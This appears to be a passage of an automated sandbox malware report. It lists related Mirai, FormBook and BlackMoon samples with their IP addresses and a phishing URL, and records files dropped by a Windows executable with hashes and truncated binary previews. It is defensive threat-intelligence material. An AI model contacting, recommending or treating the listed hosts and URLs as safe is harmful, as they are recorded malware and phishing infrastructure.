1.exe | malicious | BlackMoon | 27.221.16.179
3.exe | malicious | Unknown | 27.221.16.149
3.exe | malicious | BlackMoon, XRed | 27.221.16.149
1.exe | malicious | BlackMoon | 27.221.16.149
f2.exe | malicious | BlackMoon | 27.221.16.149
f1.exe | malicious | Unknown | 27.221.16.149
chAJcIK6ZO.exe | malicious | Unknown | 27.221.16.179

Match: sinastorage.cn
3.exe | malicious | Unknown | 183.60.95.221
3.exe | malicious | Unknown | 183.60.95.221

Match: sinastorage.com
3.exe | malicious | Unknown | 123.126.45.208
3.exe | malicious | Unknown | 123.126.45.208
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN
arm7.nn.elf | malicious | Mirai, Okiru | 221.205.161.85
mipsel.nn.elf | malicious | Mirai, Okiru | 123.191.93.51
sparc.nn.elf | malicious | Mirai, Okiru | 39.92.121.35
powerpc.nn.elf | malicious | Mirai, Okiru | 119.7.190.227
arm.nn.elf | malicious | Mirai, Okiru | 115.62.191.177
sh4.nn.elf | malicious | Mirai, Okiru | 116.142.42.96
arm5.nn.elf | malicious | Mirai, Okiru | 120.5.160.48
mips.nn.elf | malicious | Mirai, Okiru | 116.140.183.11
i586.elf | malicious | Gafgyt, Mirai | 27.210.106.148
sora.sh4.elf | malicious | Mirai | 175.21.47.174

Match: QIHOOBeijingQihuTechnologyCompanyLimitedCN
la.bot.powerpc.elf | malicious | Mirai | 101.198.200.46
la.bot.sparc.elf | malicious | Unknown | 101.197.85.223
apep.ppc.elf | malicious | Mirai | 101.197.149.7
arm5.elf | malicious | Mirai, Moobot | 101.198.207.127
x86.elf | malicious | Mirai, Moobot | 101.199.221.240
x86.elf | malicious | Mirai | 101.197.85.232
la.bot.m68k.elf | malicious | Unknown | 101.197.2.166
SecuriteInfo.com.Win32.MalwareX-gen.23947.21328.exe | malicious | BlackMoon | 104.192.108.20
SecuriteInfo.com.Win32.MalwareX-gen.23947.21328.exe | malicious | BlackMoon | 104.192.108.21
https://ebaite.cn/ | malicious | Unknown | 104.192.108.23

Match: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
get.exe | malicious | Unknown | 101.34.205.247
x86.exe | malicious | Unknown | 101.34.205.247
mipsel.elf | malicious | Gafgyt, Mirai | 101.35.205.161
Document_084462.scr.exe | malicious | FormBook, GuLoader | 101.35.209.183
attached invoice.exe | malicious | FormBook | 129.226.153.85
https://secure-page.safedocument01.workers.dev/ | malicious | HTMLPhisher | 49.51.77.119
PO_1111101161.vbs | malicious | FormBook | 129.226.153.85
Proforma invoice - Arancia NZ.exe | malicious | FormBook | 101.35.209.183
Quotation Validity.exe | malicious | FormBook, PureLog Stealer | 101.35.209.183
botx.m68k.elf | malicious | Mirai | 162.62.116.233
                                                                  No context
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: C:\Program Files (x86)\Google\D74384FB8D2C9.exe
4.exe | malicious | BlackMoon |
2.exe | malicious | BlackMoon |
1.exe | malicious | BlackMoon |
3.exe | malicious | BlackMoon, XRed |
1.exe | malicious | BlackMoon |
f2.exe | malicious | BlackMoon |
d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe | malicious | Bdaejec |
                                                                                Process:C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1168440
                                                                                Entropy (8bit):7.834939987470682
                                                                                Encrypted:false
                                                                                SSDEEP:24576:FNNUQIzh8Vd7EuHu3Z2E+XT9uZk2utlyvyaPko32:nueoJ5CUZ3uvwyaa
                                                                                MD5:0D79B45E55C20F14D9614596247B7DF2
                                                                                SHA1:F0E86CFFCAE509CC311F2BE6CC1C87CFB5616480
                                                                                SHA-256:A0C15F709E1B80E93A61CBA414E266097DC8C23A7E8DE2B6DBE825CA2952DF7E
                                                                                SHA-512:23FEF0EC6A846A96157C7F83104FA7A4B871A5244E0CF30B42513D5E8885D2E9164B30EC2C881945F6B761B294CD4A17321593C05B383414A7212316CFFCB8A4
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 13%
Joe Sandbox View:
• Filename: 4.exe, Detection: malicious
• Filename: 2.exe, Detection: malicious
• Filename: 1.exe, Detection: malicious
• Filename: 3.exe, Detection: malicious
• Filename: 1.exe, Detection: malicious
• Filename: f2.exe, Detection: malicious
• Filename: d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe, Detection: malicious
                                                                                Reputation:low
                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................3+............@..............................................@..........................,;..<.... ...............................................................................0..`...........................0.DE................................@...1.TA.....I.......4..................@...2.S......L...`..........................3.data..z*..........................@...4.ls....................................5.data..............................@...6.eloc..................................7.src........ ......................@...8.ext...............................@...9.data.......0......................@...10.ta....q...@......................@...........................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8192
                                                                                Entropy (8bit):0.3588072191296206
                                                                                Encrypted:false
                                                                                SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.8337034007498944
                                                                                Encrypted:false
                                                                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqFU
                                                                                MD5:A945D8694BAC27705D5FA7437078DAF3
                                                                                SHA1:2C4664EBBB94A4D751E2E5A734D393A5A2C36DEF
                                                                                SHA-256:67BFFF64E46F41D78163A9CF95F5BA3DB34A349F912049AA11FAD621A59E62CD
                                                                                SHA-512:15F9092B097B9FEB2201841EC6A6A5F575260386E873344E504EF0A1873362A739112CA3F1D6889B42B500148C2331213F901CCCDC7C6B9767E79C0FD5E64CD9
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x98e9c6ae, page size 16384, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.6585054990188869
                                                                                Encrypted:false
                                                                                SSDEEP:1536:ZSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Zaza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                MD5:89475E8B69706AD8D40DF4A1D4AF06CF
                                                                                SHA1:74B738675372574610040B15AC91B3CEFE68879D
                                                                                SHA-256:73F14EF8E656B4F9B17B9819FD626ECF2FC33E627CFF211AABC852C61524ED39
                                                                                SHA-512:50D29E81ED43978D7AC2C45FB38CC113FCC6B87CA594C87C2BA6AE14B24567CA59737D83F21E029B6024FD54BADB26E4C02C2C75394F2E5F233352BFFA83082C
                                                                                Malicious:false
                                                                                Preview:...... ...............X\...;...{......................T.~..........|.......|..h.|..........|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...........................................|...................A......|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.08007502238812249
                                                                                Encrypted:false
                                                                                SSDEEP:3:ptOetYeV3M9cXl+ZZ5QV5L6XlfMpZMXloll58Kgvvl/QoeP/ll:ptrzVXomV8nez8KgR+t
                                                                                MD5:84EB7191BA7B5C74865D92708F4A261A
                                                                                SHA1:8FF01FF27CD28348011066EDDD0AD4057449A4BE
                                                                                SHA-256:18D856105922977142DE1EAD6D3004B271B5A912E12E6EC7EFB56C281B4E566A
                                                                                SHA-512:6640D9A3B5AA27D523C8322D60F0C4A4E8D14510BE4AF82320409408DD45B12E8BB8039EA04A155C6E1984DAF832156F11230FBC371066DBD7EF9F7FC0A8EF94
                                                                                Malicious:false
                                                                                Preview:.jq......................................;...{.......|.......|...............|.......|...u.......|....................A......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):10
                                                                                Entropy (8bit):2.1709505944546685
                                                                                Encrypted:false
                                                                                SSDEEP:3:XNcS:XNcS
                                                                                MD5:65E9D3DA6B242EBAE13FBE883431806A
                                                                                SHA1:EC3D31CCF54A3D408BC892643768E09A86D53616
                                                                                SHA-256:3118BC039B2A71C0EA955D4E58205B95CC8FEDAA267E6B1AA65AA20E8158F4DF
                                                                                SHA-512:5C8B8A82944F5E3A831EF63AE0B53DDF80AEC957D54BC7E3CAE47C2EC5F94CDCF7969476F2A8E16F47C94BB910C706E423202B8982DAD66BAB93DA9ACE160D64
                                                                                Malicious:false
                                                                                Preview:49.7.37.97
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):13
                                                                                Entropy (8bit):3.0269868333592873
                                                                                Encrypted:false
                                                                                SSDEEP:3:EWVoeHUn:EW/HU
                                                                                MD5:8C85C23AE431A486009B8C880332F349
                                                                                SHA1:D44C4FB2D4255A0DDAEFF78FB7F3B8CBF20D3391
                                                                                SHA-256:246B14B04A3412C9669B239C7D2F5191D562FEAAF764C5A31AD48A184D91F838
                                                                                SHA-512:7F9C03C142F1965D5CBFA8EF2AC334D0B412943F4BD0B7037C3898B0C10335D14DEFA4A11E69196F72DEA13C350EDFA8C05CA6BE00AEB17F259AA5334ED3ECE0
                                                                                Malicious:false
                                                                                Preview:183.60.95.221
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):10
                                                                                Entropy (8bit):2.1709505944546685
                                                                                Encrypted:false
                                                                                SSDEEP:3:XNcS:XNcS
                                                                                MD5:65E9D3DA6B242EBAE13FBE883431806A
                                                                                SHA1:EC3D31CCF54A3D408BC892643768E09A86D53616
                                                                                SHA-256:3118BC039B2A71C0EA955D4E58205B95CC8FEDAA267E6B1AA65AA20E8158F4DF
                                                                                SHA-512:5C8B8A82944F5E3A831EF63AE0B53DDF80AEC957D54BC7E3CAE47C2EC5F94CDCF7969476F2A8E16F47C94BB910C706E423202B8982DAD66BAB93DA9ACE160D64
                                                                                Malicious:false
                                                                                Preview:49.7.37.97
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):27
                                                                                Entropy (8bit):2.707324075676644
                                                                                Encrypted:false
                                                                                SSDEEP:3:scXxn:scXx
                                                                                MD5:5978F854115158A3EBAB3F5A285C5BCB
                                                                                SHA1:0E4B4BECE557FC752BA2D2D9B849A9A4ECDDC411
                                                                                SHA-256:1CC5F5CE51581D597DD4CF065568A380F6A957504A28B69D0148B2BD82004E05
                                                                                SHA-512:BFC5FA0A513299206CE6A360146661D2F37219C61B3EBE20A96D910643F89595ECB44AD07AE316BE96637FAE4F2C19282A70746756EF131C44E6870D051B7881
                                                                                Malicious:false
                                                                                Preview:27.221.16.179;27.221.16.149
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):13
                                                                                Entropy (8bit):3.0269868333592873
                                                                                Encrypted:false
                                                                                SSDEEP:3:EWVoeHUn:EW/HU
                                                                                MD5:8C85C23AE431A486009B8C880332F349
                                                                                SHA1:D44C4FB2D4255A0DDAEFF78FB7F3B8CBF20D3391
                                                                                SHA-256:246B14B04A3412C9669B239C7D2F5191D562FEAAF764C5A31AD48A184D91F838
                                                                                SHA-512:7F9C03C142F1965D5CBFA8EF2AC334D0B412943F4BD0B7037C3898B0C10335D14DEFA4A11E69196F72DEA13C350EDFA8C05CA6BE00AEB17F259AA5334ED3ECE0
                                                                                Malicious:false
                                                                                Preview:183.60.95.221
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1197
                                                                                Entropy (8bit):4.895446083745082
                                                                                Encrypted:false
                                                                                SSDEEP:24:q8FFL3wt9MvSH3Fz/0TFJNGGl6gY+qPDE8tcqkBLAe:/z39Y3FTH7a9L
                                                                                MD5:F8C96DF155AFD6923E70CEE9072E62E8
                                                                                SHA1:377E224C5B2E33F4C656251CF45D599ABA7C772C
                                                                                SHA-256:571066CC500FAA3E4AE9561A884DBC22CDDF2659EC4906AFA7FECE11075A96F5
                                                                                SHA-512:96D723D78FC937D4465AA06DA30D08EF33A7E701035F321EDEB0B7ABD3433DA89EFB02DDF240E57F17DBB960EB786698A02B78CE175C16135EEDC9D8F0DC4314
                                                                                Malicious:false
                                                                                Preview:*{.. margin:0;.. padding:0;.. list-style: none;..}..a{.. text-decoration: none;.. color: #000;..}...bg{.. background: #000;.. width:510px;.. height:290px;.. padding:5px;.. /*display: flex;*/.. overflow: hidden;..}...bg2{.. width:100%;.. height:200px;.. margin-top: 20px;....}...bg2_1{.. color: red;.. width:100px;.. float: left;.... Writing-mode:vertical-lr;.. font-size: 40px;.. text-shadow:2px 2px 5px orange,-2px 2px 5px green;..}...bg2_2{.. width:290px;.. margin-left: 10px;.. line-height: 20px;.. /*text-align: justify;*/.. font-size: 16px;.. font-weight:500;.. color: #e7c34f;.. font-family: '....';.. text-align: left;.. float: left;..}...bg2_2 ul>li{.. margin-top: 3px;..}...bg2_2>li:first-of-type{.. margin-top: 0;..}...bg2_3{.. float: left;.. margin-left: 10px;....}...bg2_3 ul li a{.. display: block;.. background: #782410;.. color: #fff;.. font-family: "....
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):27
                                                                                Entropy (8bit):2.707324075676644
                                                                                Encrypted:false
                                                                                SSDEEP:3:sBI7:sK7
                                                                                MD5:3B120FDCA2DD8EF50F6ABB72DE0D76C5
                                                                                SHA1:F0A38571CF7D513B847F7ED85F7E3CDE97F87067
                                                                                SHA-256:E5496F9879508BD074C0D38BBBE86BA9F90CDEC1C9FFEE038484873CED268138
                                                                                SHA-512:4B40019AE7E419046D54AC4C9BAAF048385E8853D7E0AC9B050B1608FB44FA00AC1DA5BD7E12CE431E630D34379CF4E147431D18ABBF69F5CBD7615DCF70E541
                                                                                Malicious:false
                                                                                Preview:27.221.16.149;27.221.16.179
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):27
                                                                                Entropy (8bit):2.707324075676644
                                                                                Encrypted:false
                                                                                SSDEEP:3:sBI7:sK7
                                                                                MD5:3B120FDCA2DD8EF50F6ABB72DE0D76C5
                                                                                SHA1:F0A38571CF7D513B847F7ED85F7E3CDE97F87067
                                                                                SHA-256:E5496F9879508BD074C0D38BBBE86BA9F90CDEC1C9FFEE038484873CED268138
                                                                                SHA-512:4B40019AE7E419046D54AC4C9BAAF048385E8853D7E0AC9B050B1608FB44FA00AC1DA5BD7E12CE431E630D34379CF4E147431D18ABBF69F5CBD7615DCF70E541
                                                                                Malicious:false
                                                                                Preview:27.221.16.149;27.221.16.179
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):10
                                                                                Entropy (8bit):2.1709505944546685
                                                                                Encrypted:false
                                                                                SSDEEP:3:XNcS:XNcS
                                                                                MD5:65E9D3DA6B242EBAE13FBE883431806A
                                                                                SHA1:EC3D31CCF54A3D408BC892643768E09A86D53616
                                                                                SHA-256:3118BC039B2A71C0EA955D4E58205B95CC8FEDAA267E6B1AA65AA20E8158F4DF
                                                                                SHA-512:5C8B8A82944F5E3A831EF63AE0B53DDF80AEC957D54BC7E3CAE47C2EC5F94CDCF7969476F2A8E16F47C94BB910C706E423202B8982DAD66BAB93DA9ACE160D64
                                                                                Malicious:false
                                                                                Preview:49.7.37.97
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):31
                                                                                Entropy (8bit):3.0052196722704054
                                                                                Encrypted:false
                                                                                SSDEEP:3:IH1ZfUzwKxf:Wq
                                                                                MD5:52A76A3945F5FC13E96F2CDED5AECBB4
                                                                                SHA1:BD450021FC31BBE40F17B64344EB6BE0F63C54B7
                                                                                SHA-256:E5C907292C88455E311DFAB945BCA75F293581C75A1014062011C0F8B4842FD5
                                                                                SHA-512:FC636553B40E4A51F5EEDDFEB9DE0CF6AC13650D5F81471FF24B5C9ACB5F7A83C634D57DD9115461A582733F29612F607B18139843E5323AB9A1BC0D98E0DB3D
                                                                                Malicious:false
                                                                                Preview:kssdata0:|:1:|:http://:|::|::|:
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2149
                                                                                Entropy (8bit):5.387934057632549
                                                                                Encrypted:false
                                                                                SSDEEP:48:OsBu6xvv4EMsyjKaKMe/FSQyTYKIOf6IO7iRb5k:Fuy4EMJjKaKpKYWfGom
                                                                                MD5:1873552B9478AAEE52CADA49F55420ED
                                                                                SHA1:8055ADAAFE99C64BE490BB8D144C7694EAFF004A
                                                                                SHA-256:50DB81DB415DF43A7535865AB94FF802DFF948234B4C7B6F7751A0C2AB4C5015
                                                                                SHA-512:C546E3E818D3054BF39AA12D9EBC7510ED7DC8AE88372B0747C19DA45242FDBECDD8DB8EE0553A1137AEE791796E94CB4F97CE851229D712451BF7E6925462C4
                                                                                Malicious:false
                                                                                Preview:.<!doctype html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport".. content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">.. <meta http-equiv="X-UA-Compatible" content="ie=edge">.. <title>Document</title>.. <link rel="stylesheet" href="style.css">..</head>..<body>.. <div class="bg">.. <marquee behavior="alternate" style="width: 520px;color: #ffc300;font-size: 20px;font-weight: 600;margin-top:10px;text-shadow:2px 2px 5px #ccc">.....................</marquee>.. <div class="bg2">.. <div class="bg2_1">.. . . . . . . . ... </div>.. <div class="bg2_2">.. <ul>.. <li>1.....:InSert,Home,PageUp</li>.. <li>2.........15..</li>.. <li>3...............</
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):13
                                                                                Entropy (8bit):3.0269868333592873
                                                                                Encrypted:false
                                                                                SSDEEP:3:EWVoeHUn:EW/HU
                                                                                MD5:8C85C23AE431A486009B8C880332F349
                                                                                SHA1:D44C4FB2D4255A0DDAEFF78FB7F3B8CBF20D3391
                                                                                SHA-256:246B14B04A3412C9669B239C7D2F5191D562FEAAF764C5A31AD48A184D91F838
                                                                                SHA-512:7F9C03C142F1965D5CBFA8EF2AC334D0B412943F4BD0B7037C3898B0C10335D14DEFA4A11E69196F72DEA13C350EDFA8C05CA6BE00AEB17F259AA5334ED3ECE0
                                                                                Malicious:false
                                                                                Preview:183.60.95.221
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):10
                                                                                Entropy (8bit):2.1709505944546685
                                                                                Encrypted:false
                                                                                SSDEEP:3:XNcS:XNcS
                                                                                MD5:65E9D3DA6B242EBAE13FBE883431806A
                                                                                SHA1:EC3D31CCF54A3D408BC892643768E09A86D53616
                                                                                SHA-256:3118BC039B2A71C0EA955D4E58205B95CC8FEDAA267E6B1AA65AA20E8158F4DF
                                                                                SHA-512:5C8B8A82944F5E3A831EF63AE0B53DDF80AEC957D54BC7E3CAE47C2EC5F94CDCF7969476F2A8E16F47C94BB910C706E423202B8982DAD66BAB93DA9ACE160D64
                                                                                Malicious:false
                                                                                Preview:49.7.37.97
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):13312
                                                                                Entropy (8bit):5.397635444561731
                                                                                Encrypted:false
                                                                                SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):468
                                                                                Entropy (8bit):2.601014827129287
                                                                                Encrypted:false
                                                                                SSDEEP:6:dI//s70+XkXay8myU+Xbn/CBL+/kSu/GM/eS/yq/i/6:K/O0ekXQnlbn/C4/kSu/GM/eS/n/y6
                                                                                MD5:B64D446EB9AC1C4333153F1C3799C79C
                                                                                SHA1:D7186EFFC2CB690CB9CF78EFC78E0FB05AAFD375
                                                                                SHA-256:A09E4F40CB4449713C112D09157CEFACBCB67A1A1CC6F0331460EC0A2129ECAD
                                                                                SHA-512:222C05949CDD1E113591047CAC5DA458EF007328870AFF369226BAD46518632957DFE12E378BE782CB110DDA59A142975A1A67B410F409B3C0B9D7E861393B1D
                                                                                Malicious:false
                                                                                Preview:gamePluginCtrl.rar..............l...wqTongSha.rar.......................xkSHWL.rar..........................dpk_publish.rar.....................Sierra.rar..........................Loader.rar..........................Agshz.rar...........................A1108shz.rar........................A2013shz.rar........................Ageeshz.rar.........................Alegshz.rar.........................Ablueshz.rar........................dlq.rar.............................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):13312
                                                                                Entropy (8bit):5.397635444561731
                                                                                Encrypted:false
                                                                                SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):5.723671248831358
                                                                                Encrypted:false
                                                                                SSDEEP:1536:bOpvODXphadHM/653RQBwXm/KURjSDhfmjjp5QsKDhwO3b:kKZiM/65SCYymP3NKDhwE
                                                                                MD5:DD3B0103C412D3A0781FF32EBC4C7D0C
                                                                                SHA1:DDDD4AC4CC8961D6EBFA28A4DC627EB92E20B1E5
                                                                                SHA-256:DE3CCEC54582DA666CAA1FBC1FAB4BF6192189169E4470C82B194FCD0344CCE5
                                                                                SHA-512:BC04B56A5D199BBC86FA4E353CE781B0F8FAFB2A7F1B0612CB295284C15C28704DD9344D5B1227344253B8CC0FBA2402C117A43DBAAD4115A3DAB2DB041C0706
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}H..&...&...&...&...&...-...&...(...&...,...&..."...&..:-...&..:"...&...'.5.&...5...&.u.-...&.Z. ...&.u."...&.Rich..&.........PE..L...^.8Z...........!................................................................................................ :.......5.......`.......................p..........................................................@............................text............................... ..`.rdata...+.......0..................@..@.data........@.......@..............@....rsrc........`.......P..............@..@.reloc..B....p... ...`..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):163840
                                                                                Entropy (8bit):6.306746357940625
                                                                                Encrypted:false
                                                                                SSDEEP:3072:fs2c0aBV0bdukL+s45w+Icr6Hizu7HRtCfWpZQvYwvOSDc89DlMQFZ8J5/Bw9bmo:f1cB3kukL+sQw+XCnRtQaeU89LK/BIm
                                                                                MD5:203CD4EC29A18F1C8A1DDEFADC3F7382
                                                                                SHA1:47A4072EDF7C4530D4E86B84CBE5118E277DE543
                                                                                SHA-256:566086537066D3FF72167F09ADC2522AC72D24DA0601E7966367A8A85802A121
                                                                                SHA-512:28FB3CF0D811F35C387BB666070CE5B6422401E59D0748E420C246EFCF7F3ECBE6EE938242D7E93103083E9B45590ABE0E864E540B953BD3C4F3949B3D579A19
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......tN..0/..0/..0/..0/..4/...0..1/...'..2/..K3..1/..f0..5/..R0..8/...3..2/.._0..3/.._0..4/.._0..2/......5/..0/.../...0.../......7/...)..1/......1/..Rich0/..........PE..L......W...........!................+...............................................................................@................`..........................`....................................................................................text...>........................... ..`.rdata...2.......@..................@..@.data....5... ... ... ..............@....rsrc........`... ...@..............@..@.reloc..>........ ...`..............@..B........................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):288256
                                                                                Entropy (8bit):7.863404519597102
                                                                                Encrypted:false
                                                                                SSDEEP:6144:tKjl/5pBryR6m62so2PXBbCEflQgPAKZFJnq:Uplm6xo2InUAanq
